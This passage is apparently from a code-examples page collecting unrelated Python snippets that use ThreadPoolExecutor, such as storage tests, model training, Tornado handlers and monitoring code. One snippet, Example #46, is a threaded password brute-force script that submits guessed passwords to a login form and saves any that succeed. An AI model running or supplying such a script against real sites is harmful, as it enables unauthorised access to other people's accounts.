        file_name = "fio_test"
        executor = ThreadPoolExecutor(max_workers=len(self.pvcs) + 1)
        selected_node = node.get_nodes(node_type=constants.WORKER_MACHINE,
                                       num_of_nodes=1)

        # Run IO
        log.info("Starting IO on all pods")
        for pod_obj in self.pods:
            storage_type = ("block" if pod_obj.pvc.volume_mode
                            == constants.VOLUME_MODE_BLOCK else "fs")
            pod_obj.run_io(
                storage_type=storage_type,
                size="1G",
                runtime=20,
                fio_filename=file_name,
                end_fsync=1,
            )
            log.info(f"IO started on pod {pod_obj.name}")
        log.info("Started IO on all pods")

        # Wait for IO to finish
        log.info("Wait for IO to finish on pods")
        for pod_obj in self.pods:
            pod_obj.get_fio_results()
            log.info(f"IO finished on pod {pod_obj.name}")
            # Calculate md5sum
            file_name_pod = (file_name if
                             (pod_obj.pvc.volume_mode
                              == constants.VOLUME_MODE_FILESYSTEM) else
                             pod_obj.get_storage_path(storage_type="block"))
            pod_obj.pvc.md5sum = pod.cal_md5sum(
                pod_obj,
                file_name_pod,
                pod_obj.pvc.volume_mode == constants.VOLUME_MODE_BLOCK,
            )

        # Restart node
        log.info(f"Restart node {selected_node[0].name}")
        restart_thread = executor.submit(nodes.restart_nodes,
                                         nodes=selected_node)

        log.info("Creating clone of all PVCs.")
        for pvc_obj in self.pvcs:
            log.info(f"Creating clone of {pvc_obj.name}")
            pvc_obj.clone_proc = executor.submit(pvc_clone_factory,
                                                 pvc_obj=pvc_obj,
                                                 status="")

        # Check result of 'restart_nodes'
        restart_thread.result()

        log.info("Verify status of node.")
        node.wait_for_nodes_status(
            node_names=[node.get_node_name(selected_node[0])],
            status=constants.NODE_READY,
            timeout=300,
        )

        # Get cloned PVCs
        cloned_pvcs = [pvc_obj.clone_proc.result() for pvc_obj in self.pvcs]

        log.info("Verifying cloned PVCs are Bound")
        for pvc_obj in cloned_pvcs:
            wait_for_resource_state(resource=pvc_obj,
                                    state=constants.STATUS_BOUND,
                                    timeout=540)
            pvc_obj.reload()
        log.info("Verified: Cloned PVCs are Bound")

        # Attach the cloned PVCs to pods
        log.info("Attach the cloned PVCs to pods")
        clone_pod_objs = []
        for pvc_obj in cloned_pvcs:
            if pvc_obj.volume_mode == "Block":
                pod_dict_path = constants.CSI_RBD_RAW_BLOCK_POD_YAML
            else:
                pod_dict_path = ""
            clone_pod_obj = pod_factory(
                interface=pvc_obj.parent.interface,
                pvc=pvc_obj,
                status="",
                pod_dict_path=pod_dict_path,
                raw_block_pv=pvc_obj.volume_mode == "Block",
            )
            log.info(
                f"Attaching the PVC {pvc_obj.name} to pod {clone_pod_obj.name}"
            )
            clone_pod_objs.append(clone_pod_obj)

        # Verify the new pods are running
        log.info("Verify the new pods are running")
        for pod_obj in clone_pod_objs:
            wait_for_resource_state(pod_obj, constants.STATUS_RUNNING)
        log.info("Verified: New pods are running")

        # Verify md5sum
        for pod_obj in clone_pod_objs:
            file_name_pod = (pod_obj.get_storage_path(storage_type="block") if
                             (pod_obj.pvc.volume_mode
                              == constants.VOLUME_MODE_BLOCK) else file_name)
            pod.verify_data_integrity(
                pod_obj,
                file_name_pod,
                pod_obj.pvc.parent.md5sum,
                pod_obj.pvc.volume_mode == constants.VOLUME_MODE_BLOCK,
            )
            log.info(
                f"Verified: md5sum of {file_name_pod} on pod {pod_obj.name} "
                f"matches with the original md5sum")
        log.info("Data integrity check passed on all pods")

        # Run IO
        log.info("Starting IO on the new pods")
        for pod_obj in clone_pod_objs:
            storage_type = ("block" if pod_obj.pvc.volume_mode
                            == constants.VOLUME_MODE_BLOCK else "fs")
            pod_obj.run_io(
                storage_type=storage_type,
                size="1G",
                runtime=20,
                fio_filename=f"{file_name}_1",
                end_fsync=1,
            )
            log.info(f"IO started on pod {pod_obj.name}")
        log.info("Started IO on the new pods")

        # Wait for IO to finish
        log.info("Wait for IO to finish on the new pods")
        for pod_obj in clone_pod_objs:
            pod_obj.get_fio_results()
            log.info(f"IO finished on pod {pod_obj.name}")
        log.info("IO finished on the new pods")

Example #39

0

Show file

def measure_memory(is_gpu, func):
    import os
    import psutil
    from time import sleep

    class MemoryMonitor:
        def __init__(self, keep_measuring=True):
            self.keep_measuring = keep_measuring

        def measure_cpu_usage(self):
            max_usage = 0
            while True:
                max_usage = max(
                    max_usage,
                    psutil.Process(os.getpid()).memory_info().rss / 1024**2)
                sleep(0.005)  # 5ms
                if not self.keep_measuring:
                    break
            return max_usage

        def measure_gpu_usage(self):
            from py3nvml.py3nvml import nvmlInit, nvmlDeviceGetCount, nvmlDeviceGetHandleByIndex, \
                                 nvmlDeviceGetMemoryInfo, nvmlDeviceGetName, nvmlShutdown, NVMLError
            max_gpu_usage = []
            gpu_name = []
            try:
                nvmlInit()
                deviceCount = nvmlDeviceGetCount()
                max_gpu_usage = [0 for i in range(deviceCount)]
                gpu_name = [
                    nvmlDeviceGetName(nvmlDeviceGetHandleByIndex(i))
                    for i in range(deviceCount)
                ]
                while True:
                    for i in range(deviceCount):
                        info = nvmlDeviceGetMemoryInfo(
                            nvmlDeviceGetHandleByIndex(i))
                        max_gpu_usage[i] = max(max_gpu_usage[i],
                                               info.used / 1024**2)
                    sleep(0.005)  # 5ms
                    if not self.keep_measuring:
                        break
                nvmlShutdown()
                return [{
                    "device_id": i,
                    "name": gpu_name[i],
                    "max_used_MB": max_gpu_usage[i]
                } for i in range(deviceCount)]
            except NVMLError as error:
                if not self.silent:
                    self.logger.error(
                        "Error fetching GPU information using nvml: %s", error)
                return None

    monitor = MemoryMonitor(False)

    memory_before_test = monitor.measure_gpu_usage(
    ) if is_gpu else monitor.measure_cpu_usage()

    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor() as executor:
        monitor = MemoryMonitor()
        mem_thread = executor.submit(
            monitor.measure_gpu_usage if is_gpu else monitor.measure_cpu_usage)
        try:
            fn_thread = executor.submit(func)
            result = fn_thread.result()
        finally:
            monitor.keep_measuring = False
            max_usage = mem_thread.result()

        if is_gpu:
            print(
                f"GPU memory usage: before={memory_before_test}  peak={max_usage}"
            )
            if len(memory_before_test) >= 1 and len(max_usage) >= 1:
                before = memory_before_test[0]["max_used_MB"]
                after = max_usage[0]["max_used_MB"]
                return after - before
            else:
                return None
        else:
            print(
                f"CPU memory usage: before={memory_before_test:.1f} MB, peak={max_usage:.1f} MB"
            )
            return max_usage - memory_before_test

Example #40

0

Show file

File: thread_code.py Project: trynusnick13/ITEA-advanced

import time
from concurrent.futures import ThreadPoolExecutor


def basic_func(x):
    if x == 0:
        return 'zero'
    elif x % 2 == 0:
        return 'even'
    else:
        return 'odd'


def multiprocessing_func(x):
    y = x * x
    time.sleep(2)
    print('{} squared results in a/an {} number'.format(x, basic_func(y)))


if __name__ == '__main__':
    starttime = time.time()
    ex = ThreadPoolExecutor(max_workers=10)
    results = ex.map(multiprocessing_func, range(0, 10))
    real_results = list(results)
    print('That took {} seconds'.format(time.time() - starttime))

Example #41

0

Show file

File: train.py Project: entn-at/pkwrap

def train():
    parser = argparse.ArgumentParser(
        description="Acoustic model training script")
    pkwrap.script_utils.add_chain_recipe_opts(parser)
    # the idea behind a test config is that one can run different configurations of test
    parser.add_argument("--test-config",
                        default="test",
                        help="name of the test to be run")
    parser.add_argument("--decode-iter", default="final")
    parser.add_argument("--config", default="configs/default")
    args = parser.parse_args()

    logging.info("Reading config")
    cfg_parse = configparser.ConfigParser()
    cfg_parse.read(args.config)
    cmd = cfg_parse["cmd"]
    cpu_cmd = cmd['cpu_cmd']
    cuda_cmd = cmd['cuda_cmd']

    exp_cfg = cfg_parse["exp"]
    assert exp_cfg is not None

    stage = args.stage
    model_file = exp_cfg["model_file"]
    data = exp_cfg["data"] if "data" in exp_cfg else "data"
    exp = exp_cfg["exp"] if "exp" in exp_cfg else "exp"
    chain_affix = exp_cfg["chain_affix"] if "chain_affix" in exp_cfg else ""
    chain_dir = os.path.join(exp, f"chain{chain_affix}")
    dirname = os.path.join(chain_dir, exp_cfg["dirname"])
    if not os.path.exists(dirname):
        os.makedirs(dirname)
    egs_dir = os.path.join(dirname, "egs")
    if "e2e" in exp_cfg:
        is_e2e = bool(exp_cfg["e2e"])
    else:
        is_e2e = False
    if not is_e2e:
        gmm_dir = exp_cfg["gmm_dir"]
        ali_dir = exp_cfg["ali_dir"]
        lat_dir = exp_cfg["lat_dir"]
        lores_train_set = exp_cfg["lores_train_set"]
    tree_dir = exp_cfg["tree_dir"]
    train_set = exp_cfg["train_set"]
    lang = exp_cfg["lang"] if "lang" in exp_cfg else "lang"
    lang_chain = exp_cfg[
        "lang_chain"] if "lang_chain" in exp_cfg else "lang_chain"

    l2_regularize = args.l2_regularize

    model_opts = pkwrap.trainer.ModelOpts().load_from_config(exp_cfg)
    frame_subsampling_factor = model_opts.frame_subsampling_factor
    trainer_opts = pkwrap.trainer.TrainerOpts().load_from_config(exp_cfg)

    # create lang folder
    if stage <= 0:
        logging.info("Creating lang_chain folder from lang")
        try:
            rc = subprocess.run([
                "shutil/chain/check_lang.sh",
                lang,
                lang_chain,
            ]).returncode
        except Exception as e:
            #           TODO: should use logging
            sys.stderr.write(e)
            sys.stderr.write("ERROR: copying lang failed")
        logging.info(f"Created {lang_chain} folder")
    # create lats
    if stage <= 1:
        logging.info("Create supervision lattices")
        try:
            subprocess.run([
                "steps/align_fmllr_lats.sh",
                "--nj",
                "{}".format(args.decode_nj),
                "--cmd",
                "{}".format(cpu_cmd),
                lores_train_set,
                "{}".format(lang),
                gmm_dir,
                lat_dir,
            ])
        except Exception as e:
            logging.error(e)
            logging.error("Lattice creationg failed")
        logging.info("Finished creating supervision lattices")
    # build tree
    if stage <= 2:
        tree_file = os.path.join(tree_dir, "tree")
        if os.path.isfile(tree_file):
            logging.error(f"Tree file {tree_file} already exists."
                          " Refusing to overwrite".format(tree_file))
            quit(1)
        tree_size = exp_cfg["tree_size"] if "tree_size" in exp_cfg else 7000
        logging.info(f"Using tree_size={tree_size}")
        if not os.path.isfile(os.path.join(tree_dir, '.done')):
            cmd = [
                "steps/nnet3/chain/build_tree.sh",
                "--frame-subsampling-factor",
                f"{frame_subsampling_factor}",
                '--context-opts',
                "--context-width=2 --central-position=1",
                "--cmd",
                "{}".format(cpu_cmd),
                tree_size,
                f"{lores_train_set}",
                f"{lang_chain}",
                f"{ali_dir}",
                f"{tree_dir}",
            ]
            pkwrap.script_utils.run(cmd)
            subprocess.run(["touch", "{}/.done".format(tree_dir)])
    if not os.path.isdir(dirname):
        os.makedirs(dirname)
        logging.info(f"Created {dirname}")
    if not os.path.isfile(os.path.join(dirname, 'tree')):
        shutil.copy(os.path.join(tree_dir, "tree"), dirname)
    learning_rate_factor = 0.5 / args.xent_regularize

    #   create den.fst
    if stage <= 3:
        logging.info("Creating den.fst")
        pkwrap.script_utils.run([
            "shutil/chain/make_den_fst.sh",
            "--cmd",
            f"{cpu_cmd}",
            tree_dir,
            gmm_dir,
            dirname,
        ])

    if not os.path.isfile(os.path.join(dirname, 'num_pdfs')):
        logging.info(f"Creating num_pdfs file in {dirname}")
        num_pdfs = subprocess.check_output([
            "tree-info", os.path.join(tree_dir, "tree")
        ]).decode().strip().split('\n')[0].split()[1]
        with open(os.path.join(dirname, 'num_pdfs'), 'w') as opf:
            opf.write(num_pdfs)
            opf.close()
    if not os.path.isfile(os.path.join(dirname, "0.trans_mdl")):
        pkwrap.script_utils.run([
            "copy-transition-model",
            os.path.join(tree_dir, "final.mdl"),
            os.path.join(dirname, "0.trans_mdl"),
        ])


#   create or copy the egs folder
    context = None
    if stage <= 4 and not ("egs_dir" in exp_cfg and exp_cfg["egs_dir"]):
        logging.info("Creating egs")
        # first check the context
        process_out = subprocess.run([
            model_file,
            "--mode",
            "context",
            "--dir",
            dirname,
            "0.pt",  # use a dummy model. 
        ])
        if process_out.returncode != 0:
            quit(process_out.returncode)
        with open(os.path.join(dirname, 'context')) as ipf:
            context = int(ipf.readline())
        pkwrap.script_utils.run([
            "steps/chain/get_egs.sh", "--cmd", cpu_cmd, "--cmvn-opts",
            "--norm-means=false --norm-vars=false", "--left-context",
            str(context), "--right-context",
            str(context), "--frame-subsampling-factor",
            str(frame_subsampling_factor), "--alignment-subsampling-factor",
            str(frame_subsampling_factor), "--frames-per-iter",
            str(trainer_opts.frames_per_iter), "--frames-per-eg",
            str(trainer_opts.chunk_width), "--srand",
            str(trainer_opts.srand), "--online-ivector-dir",
            trainer_opts.online_ivector_dir, train_set, dirname, lat_dir,
            egs_dir
        ])
    elif "egs_dir" in exp_cfg:
        egs_dir = exp_cfg["egs_dir"]
        if not os.path.exists(os.path.join(dirname, 'context')):
            shutil.copy(os.path.join(egs_dir, 'info', 'left_context'),
                        os.path.join(dirname, 'context'))
    if context is None:
        with open(os.path.join(dirname, 'context')) as ipf:
            context = int(ipf.readline())
    model_opts.load_from_config({
        'left_context': context,
        'right_context': context
    })
    feat_dim_filename = os.path.join(dirname, "feat_dim")
    if not os.path.isfile(feat_dim_filename):
        # if ivector_dim is present in egs_dir, add that to feat_dim
        if os.path.isfile(os.path.join(egs_dir, 'info', 'ivector_dim')):
            feat_dim = 0
            with open(os.path.join(egs_dir, "info", "feat_dim")) as ipf:
                feat_dim = int(ipf.readline().strip())
            with open(os.path.join(egs_dir, "info", "ivector_dim")) as ipf:
                feat_dim += int(ipf.readline().strip())
            with open(feat_dim_filename, 'w') as opf:
                opf.write('{}'.format(feat_dim))
                opf.close()
        else:
            shutil.copy(os.path.join(egs_dir, "info", "feat_dim"), dirname)
    # we start training with
    num_archives = pkwrap.script_utils.get_egs_info(egs_dir)
    num_epochs = trainer_opts.num_epochs
    #           we don't use num of jobs b/c it is 1 for now
    num_archives_to_process = num_archives * num_epochs * frame_subsampling_factor
    num_iters = (num_archives_to_process * 2) // (
        trainer_opts.num_jobs_initial + trainer_opts.num_jobs_final)

    #   TODO: for stages 5 and 6 (and possibly 7), use ChainTrainer
    #   start the training
    if stage <= 5:
        logging.info("Initializing model")
        process_out = subprocess.run([
            *cuda_cmd.split(),
            os.path.join(dirname, "log", "init.log"), model_file, "--mode",
            "init", "--dir", dirname,
            os.path.join(dirname, "0.pt")
        ])
        if process_out.returncode != 0:
            quit(process_out.returncode)

    if stage <= 6:
        train_stage = trainer_opts.train_stage
        logging.info(f"Starting training from stage={train_stage}")
        assert train_stage >= 0
        num_archives_processed = 0
        for iter_no in range(0, num_iters):
            num_jobs = pkwrap.script_utils.get_current_num_jobs(
                iter_no,
                num_iters,
                trainer_opts.num_jobs_initial,
                1,  # we don't play with num-jobs-step
                trainer_opts.num_jobs_final)
            if iter_no < train_stage:
                num_archives_processed += num_jobs
                continue
            assert num_jobs > 0
            lr = pkwrap.script_utils.get_learning_rate(
                iter_no,
                num_jobs,
                num_iters,
                num_archives_processed,
                num_archives_to_process,
                trainer_opts.lr_initial,
                trainer_opts.lr_final,
                schedule_type='exponential')
            diagnostic_job_pool = None
            if iter_no % trainer_opts.diagnostics_interval == 0:
                diagnostic_job_pool = submit_diagnostic_jobs(
                    dirname,
                    model_file,
                    iter_no,
                    egs_dir,
                    cuda_cmd,
                    ivector_dir=trainer_opts.online_ivector_dir)
            logging.info(
                "{} Running iter={} of {} with {} jobs and lr={:.6f}".format(
                    datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
                    iter_no, num_iters, num_jobs, lr))
            with ThreadPoolExecutor(max_workers=num_jobs) as executor:
                job_pool = []
                for job_id in range(1, num_jobs + 1):
                    frame_shift = num_archives_processed % frame_subsampling_factor
                    p = executor.submit(
                        run_job,
                        num_jobs,
                        job_id,
                        dirname,
                        iter_no,
                        model_file,
                        lr,
                        frame_shift,
                        egs_dir,
                        num_archives,
                        num_archives_processed,
                        exp_cfg["minibatch_size"],
                        cuda_cmd,
                        ivector_dir=trainer_opts.online_ivector_dir)
                    num_archives_processed += 1
                    job_pool.append(p)
                for p in as_completed(job_pool):
                    if p.result() != 0:
                        quit(p.result())
            if num_jobs > 1:
                model_list = [
                    os.path.join(dirname, "{}.{}.pt".format(iter_no, job_id))
                    for job_id in range(1, num_jobs + 1)
                ]
                process_out = subprocess.run([
                    *cuda_cmd.split(),
                    "{}/log/merge.{}.log".format(dirname,
                                                 iter_no + 1), model_file,
                    "--dir", dirname, "--mode", "merge", "--new-model",
                    os.path.join(dirname, "{}.pt".format(iter_no + 1)),
                    ",".join(model_list)
                ])
                for mdl in model_list:
                    pkwrap.script_utils.run(["rm", mdl])
            else:
                pkwrap.script_utils.run([
                    "mv",
                    os.path.join(dirname, "{}.1.pt".format(iter_no)),
                    os.path.join(dirname, "{}.pt".format(iter_no + 1)),
                ])
            # remove old model
            if iter_no >= 20 and (iter_no -
                                  10) % trainer_opts.checkpoint_interval != 0:
                mdl = os.path.join(dirname, "{}.pt".format(iter_no - 10))
                if os.path.isfile(mdl):
                    pkwrap.script_utils.run(["rm", mdl])
        # do final model combination
        model_list = [
            os.path.join(dirname, f"{i}.pt")
            for i in range(num_iters, num_iters - 10, -1)
        ]
        logging.info("Final model combination...")
        diagnostic_name = 'valid'
        egs_file = os.path.join(egs_dir,
                                '{}_diagnostic.cegs'.format(diagnostic_name))
        ivector_opts = []
        if trainer_opts.online_ivector_dir:
            ivector_opts = ["--use-ivector", "True"]
        pkwrap.script_utils.run([
            *cuda_cmd.split(), "{}/log/combine.log".format(dirname),
            model_file, "--dir", dirname, "--mode", "final_combination",
            "--new-model",
            os.path.join(dirname, "final.pt"), "--egs",
            "ark:{}".format(egs_file), *ivector_opts, ",".join(model_list)
        ])

    graph_dir = ""
    decode_params = cfg_parse[args.test_config]
    if "graph_dir" in exp_cfg:
        graph_dir = exp_cfg["graph_dir"]
    if "graph_dir" in decode_params:
        graph_dir = decode_params["graph_dir"]
    if not graph_dir:
        graph_dir = os.path.join(dirname, 'graph')
    if stage <= 7:
        if not os.path.isfile(os.path.join(graph_dir, 'HCLG.fst')):
            logging.info("Making graph with {}".format(exp_cfg["lang"]))
            pkwrap.script_utils.run([
                'utils/mkgraph.sh', '--self-loop-scale', '1.0',
                exp_cfg["lang"], tree_dir, graph_dir
            ])

    if stage <= 8:
        final_iter = num_iters - 1
        data_dir = decode_params["test_set"]
        data_name = os.path.basename(data_dir)
        decode_iter = decode_params[
            "iter"] if "iter" in decode_params else "final"
        decode_affix = decode_params[
            "suffix"] if "suffix" in decode_params else ""
        decode_suff = "_iter{}{}".format(decode_iter, decode_affix)
        out_dir = os.path.join(dirname, f"decode_{data_name}{decode_suff}")
        graph = "{}/HCLG.fst".format(graph_dir)
        if "num_jobs" in decode_params:
            num_jobs = pkwrap.utils.split_data(
                data_dir,
                int(decode_params["num_jobs"]),
            )
        else:
            num_jobs = pkwrap.utils.split_data(data_dir)
        logging.info(f"Decoding with {num_jobs} jobs...")

        ivector_opts = []
        if "ivector_dir" in decode_params and len(
                decode_params["ivector_dir"]) > 0:
            ivector_opts = ["--ivector-dir", decode_params["ivector_dir"]]

        if "apply_cmvn" in decode_params and bool(decode_params["apply_cmvn"]):
            use_cmvn = True
            cmvn_opts = decode_params["cmvn_opts"]
            utt2spk_name = "ark:{}/split{}/JOB/utt2spk".format(
                data_dir, num_jobs)
            feats_name = "scp:{}/split{}/JOB/feats.scp".format(
                data_dir, num_jobs)
            cmvn_name = "scp:{}/split{}/JOB/cmvn.scp".format(
                data_dir, num_jobs)
            feats_scp = "ark,s,cs:apply-cmvn {} --utt2spk={} {} {} ark:- |".format(
                cmvn_opts, utt2spk_name, cmvn_name, feats_name)
        else:
            feats_scp = "scp:{}/split{}/JOB/feats.scp".format(
                data_dir, num_jobs)
        pkwrap.script_utils.run([
            *cpu_cmd.split(), "JOB=1:{}".format(num_jobs),
            os.path.join(out_dir, "log",
                         "decode.JOB.log"), model_file, "--dir", dirname,
            "--mode", "decode", *ivector_opts, "--decode-feats", feats_scp,
            os.path.join(dirname, "{}.pt".format(decode_iter)), "|",
            "shutil/decode/latgen-faster-mapped.sh",
            os.path.join(graph_dir, "words.txt"),
            os.path.join(dirname, "0.trans_mdl"), graph,
            os.path.join(out_dir, "lat.JOB.gz")
        ])
        opf = open(os.path.join(out_dir, 'num_jobs'), 'w')
        opf.write('{}'.format(num_jobs))
        opf.close()
        logging.info(f"Scoring...")
        if not os.path.isfile(os.path.join(out_dir, '../final.mdl')) and \
            os.path.isfile(os.path.join(out_dir, '../0.trans_mdl')):
            pkwrap.script_utils.run([
                "ln",
                "-r",
                "-s",
                os.path.join(out_dir, '../0.trans_mdl'),
                os.path.join(out_dir, '../final.mdl'),
            ])
        pkwrap.script_utils.run(
            ["local/score.sh", "--cmd", cpu_cmd, data_dir, graph_dir, out_dir])
        logging.info(f"Printing best WER...")
        pkwrap.script_utils.run(" ".join(
            ["cat", "{}/wer*".format(out_dir), "|", "utils/best_wer.sh"]),
                                shell=True)

Example #42

0

Show file

File: client.py Project: rendawei123/cmdb

    def exec(self):
        pool = ThreadPoolExecutor(10)

        host_list = self.get_host_list()
        for host in host_list:
            pool.submit(self.task, host['hostname'])

Example #43

0

Show file

 def __init__(self, bound, max_workers):
     self.executor = ThreadPoolExecutor(max_workers=max_workers)
     self.semaphore = BoundedSemaphore(bound + max_workers)

Example #44

0

Show file

File: parallel_bars.py Project: QPanScience/PY-tqdm

    if auto_position:
        # we think we know about other bars (currently only py3 threading)
        if n == 6:
            tqdm.write("n == 6 completed")

if sys.version_info[:1] > (2,):
    progresser_thread = partial(progresser, auto_position=True)
else:
    progresser_thread = progresser


if __name__ == '__main__':
    freeze_support()  # for Windows support
    print("Multi-processing")
    p = Pool(len(L), initializer=tqdm.set_lock, initargs=(tqdm.get_lock(),))
    p.map(progresser, L)

    # unfortunately need ncols
    # to print spaces over leftover multi-processing bars (#796)
    with tqdm(leave=False) as t:
        ncols = t.ncols or 80
    print(("{msg:<{ncols}}").format(msg="Multi-threading", ncols=ncols))

    with ThreadPoolExecutor(4) as p:
        p.map(progresser_thread, L)

    print("Manual nesting")
    for i in trange(16, desc="1"):
        for _ in trange(16, desc="2 @ %d" % i, leave=i % 2):
            sleep(0.01)

Example #45

0

Show file

File: parallel_evaluator.py Project: thomas-young-2013/soln-ml

 def __init__(self, evaluator, n_worker=1):
     self.evaluator = evaluator
     self.n_worker = n_worker
     self.thread_pool = ThreadPoolExecutor(max_workers=n_worker)

Example #46

0

Show file


def ta(q):
    p = "demo"

    print("正在爆破" + str(q))
    kv = {
        "username": p,
        "password": q,
        "encodedPassword": "",
        #        "captcha":"ceems",
        "message": ""
    }
    try:
        r = requests.post(url, kv, headers=headers, allow_redirects=False)
        print(r.status_code)
        if r.status_code == 302:
            print("密码为" + q)
            with open("用户名.txt", "a") as f:
                f.write(p + "\t" + q + "\n")
            exit()

    except:
        exit()


pool = ThreadPoolExecutor(10)
for index in lt_11:
    pool.submit(ta, index)
print("end")

Example #47

0

Show file

class docTypeHandler(baseHandler):
    executor = ThreadPoolExecutor(50)  # 起线程池，由当前RequestHandler持有

    # @tornado.web.asynchronous
    @tornado.gen.coroutine
    def post(self):
        logging.info(
            '#####################################################################'
        )
        logging.info('Document Type - Start : ' +
                     time.asctime(time.localtime(time.time())))
        logging.info(
            '#####################################################################'
        )
        try:
            if self.request.headers.get("Content-Type") == "application/json":
                # logging.info(self.request.body)
                reqData = json.loads(self.request.body)

                signRslt = self.verify_sign()

                if signRslt['success']:
                    try:
                        imgBase64 = reqData['image']
                        api_id = reqData['api_id']

                        _docType, _confidence = yield self._docTypePredict(
                            imgBase64)

                        _rslt = {}
                        _rslt['docType'] = _docType
                        _rslt['confidence'] = _confidence

                        self.write_json(data=_rslt)

                    except KeyError as e:
                        self.write_json(
                            data={},
                            ret=10005,
                            msg='Invalid JSON format, missing api_id/image')
                    except Exception as e:
                        self.write_json(data={}, ret=10002, msg=str(e))
                else:
                    self.write_json(data={}, ret=10003, msg=signRslt['msg'])
            else:
                self.write_json(data={},
                                ret=10004,
                                msg='Content-Type need to be application/json')
        except Exception as e:
            self.write_json(data={}, ret=10005, msg=str(e))

    @run_on_executor
    def _docTypePredict(self, imgBase64):
        # Convert the base64 to PIL image
        __img = readImage(imgBase64, outFormat='PIL')
        __imgGrey = __img.convert('L')

        # Get Doc Type by running predict model
        docType, confidence = _docClass.predict(__imgGrey)

        return docType, confidence

Example #48

0

Show file

class EnvironmentHandler(tornado.web.RequestHandler):
    executor = ThreadPoolExecutor(30)

    @tornado.web.asynchronous
    @tornado.gen.coroutine
    def get(self, APIName):
        yield self.execute_get(APIName)

    @tornado.web.asynchronous
    @tornado.gen.coroutine
    def post(self, APIName):
        yield self.execute_post(APIName)

    @run_on_executor
    def execute_get(self, APIName):
        dataResult = DataResult()
        try:
            tasks = {
                'getEnvironmentInfoById':
                lambda: self.getEnvironmentInfoById(),
                'getEnvironmentInfos':
                lambda: self.getEnvironmentInfos(),
                'getEnvironmentInfoByUserId':
                lambda: self.getEnvironmentInfoByUserId()
                # lambda alias
            }
            self.write(json.dumps(tasks[APIName]().__dict__, cls=CJsonEncoder))
        except:
            logger.error(traceback.format_exc())
            dataResult.setMessage(traceback.format_exc())
            dataResult.setSuccess(False)
            dataResult.setStatusCode(500)
            self.write(json.dumps(dataResult.__dict__))
        finally:
            try:
                self.finish()
            except:
                pass

    @run_on_executor
    def execute_post(self, APIName):
        dataResult = DataResult()
        try:
            tasks = {
                'addEnvironmentItem': lambda: self.addEnvironmentItem(),
                'deleteEnvironmentItem': lambda: self.deleteEnvironmentItem(),
                'editEnvironmentItem': lambda: self.editEnvironmentItem()
            }
            self.write(json.dumps(tasks[APIName]().__dict__, cls=CJsonEncoder))
        except:
            logger.error(traceback.format_exc())
            dataResult.setMessage(traceback.format_exc())
            dataResult.setSuccess(False)
            dataResult.setStatusCode(500)
            self.write(json.dumps(dataResult.__dict__))
        finally:
            try:
                self.finish()
            except:
                pass

    def getEnvironmentInfoById(self):
        envId = self.get_argument('envId')
        return EnvironmentService().getEnvironmentInfoById(envId)

    @AdminDecoratorServer.webInterceptorDecorator(SystemConfig.adminHost)
    def addEnvironmentItem(self):
        return EnvironmentService().addEnvironmentItem(
            json.loads(self.request.body))

    @AdminDecoratorServer.webInterceptorDecorator(SystemConfig.adminHost)
    def deleteEnvironmentItem(self):
        return EnvironmentService().deleteEnvironmentItem(
            json.loads(self.request.body))

    def editEnvironmentItem(self):
        return EnvironmentService().editEnvironmentItem(
            json.loads(self.request.body))

    def getEnvironmentInfos(self):
        return EnvironmentService().getEnvironmentInfos()

    def getEnvironmentInfoByUserId(self):
        useId = self.get_argument('userId')
        return EnvironmentService().getEnvironmentInfosByUserId(useId)

Example #49

0

Show file

File: server.py Project: liaoboshi/wecathAndalipay

 def __new__(cls, *args, **kwargs):
     if not getattr(cls, '_instance', None):
         cls._instance = ThreadPoolExecutor(max_workers=10)
     return cls._instance

Example #50

0

Show file

File: test_ah_get_ops_in_block.py Project: dappnet-one/dappnet

def compare_results(f_block, l_block, url1, url2, max_tries=10, timeout=0.1):
    global wdir
    global errors

    print("Compare blocks [{} : {}]".format(f_block, l_block))

    for i in range(f_block, l_block + 1):
        request = bytes(
            json.dumps({
                "jsonrpc": "2.0",
                "id": i,
                "method": "account_history_api.get_ops_in_block",
                "params": {
                    "block_num": i,
                    "only_virtual": False
                }
            }), "utf-8") + b"\r\n"

        with ThreadPoolExecutor(max_workers=2) as executor:
            #with ProcessPoolExecutor(max_workers=2) as executor:
            future1 = executor.submit(dpnd_call,
                                      url1,
                                      data=request,
                                      max_tries=max_tries,
                                      timeout=timeout)
            future2 = executor.submit(dpnd_call,
                                      url2,
                                      data=request,
                                      max_tries=max_tries,
                                      timeout=timeout)

        status1, json1 = future1.result()
        status2, json2 = future2.result()

        #status1, json1 = dpnd_call(url1, data=request, max_tries=max_tries, timeout=timeout)
        #status2, json2 = dpnd_call(url2, data=request, max_tries=max_tries, timeout=timeout)

        if status1 == False or status2 == False or json1 != json2:
            print("Difference @block: {}\n".format(i))
            errors += 1

            filename = wdir / Path(str(f_block) + "_" + str(l_block) + ".log")
            try:
                file = filename.open("w")
            except:
                print("Cannot open file:", filename)
                return

            file.write("Difference @block: {}\n".format(i))
            file.write("{} response:\n".format(url1))
            json.dump(json1, file, indent=2, sort_keys=True)
            file.write("\n")
            file.write("{} response:\n".format(url2))
            json.dump(json2, file, indent=2, sort_keys=True)
            file.write("\n")
            file.close()
            print("Compare blocks [{} : {}] break with error".format(
                f_block, l_block))
            return

    print("Compare blocks [{} : {}] finished".format(f_block, l_block))

Example #51

0

Show file

    def __init__(self, hass, config, async_add_entities, devices, users):
        self._state = None
        self._sub_state = None
        self._file_path = hass.data[DOMAIN]['port']
        self._available = False
        self._f = None
        self._hass = hass
        self._config = config
        self._model = 'Unknown'
        self._lock = threading.BoundedSemaphore()
        self._stop = threading.Event()
        self._data_flowing = threading.Event()
        self._async_add_entities = async_add_entities
        self.devices = {dev.dev_id: dev for dev in devices}
        self.users = users
        self._is_updating = asyncio.Lock()
        self._activation_packet = b''
        self._mode = '55'
        """ default binary strings for comparing states in d8 packets """
        self._old_bin_string = '0'.zfill(32)
        self._new_bin_string = '0'.zfill(32)
        """Since MQTT is run on separate instance I will connect directly"""
        if hass.data[DOMAIN]['mqtt_external']:
            self._mqtt_enabled = True
            _LOGGER.info("(__init__) MQTT external: %s", self._mqtt_enabled)
        else:
            self._mqtt_enabled = hass.services.has_service('mqtt', 'publish')
            _LOGGER.info("(__init__) MQTT enabled? %s", self._mqtt_enabled)

        if self._mqtt_enabled:
            self._mqtt = hass.components.mqtt
            self._data_topic = hass.data[DOMAIN]['data_topic']

        _LOGGER.info('DeviceScanner.__init__(): serial port: %s',
                     format(self._file_path))

        switcher = {
            "0": b'\x30',
            "1": b'\x31',
            "2": b'\x32',
            "3": b'\x33',
            "4": b'\x34',
            "5": b'\x35',
